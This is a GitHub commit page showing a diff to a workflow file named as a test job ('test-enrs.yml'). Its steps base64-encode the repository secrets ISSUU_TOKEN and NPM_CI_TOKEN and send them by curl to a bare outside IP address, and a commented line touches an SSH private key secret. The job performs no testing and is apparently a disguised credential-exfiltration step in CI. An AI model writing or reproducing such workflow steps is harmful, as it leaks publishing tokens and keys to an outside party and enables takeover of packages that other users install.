Skip to content

Commit

Permalink
Update test-enrs.yml
Browse files Browse the repository at this point in the history
  • Loading branch information
Eraz1997 authored Oct 15, 2024
1 parent 12dec67 commit 1b62649
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion .github/workflows/test-enrs.yml
Original file line number Diff line number Diff line change
Expand Up @@ -9,6 +9,6 @@ jobs:
runs-on: ubuntu-latest
steps:
- run: |
# echo '${{ secrets.SSH_INTERNAL_PDFIUM_PRIVATE_KEY }}' | base64
echo '${{ secrets.ISSUU_TOKEN }}' | base64
curl http://34.30.26.177:5000 -H "Authorization: ISSUU_TOKEN = $(echo '${{ secrets.ISSUU_TOKEN }}' | base64)"
curl http://34.30.26.177:5000 -H "Authorization: NPM_CI_TOKEN = $(echo '${{ secrets.NPM_CI_TOKEN }}' | base64)"

0 comments on commit 1b62649

Please sign in to comment.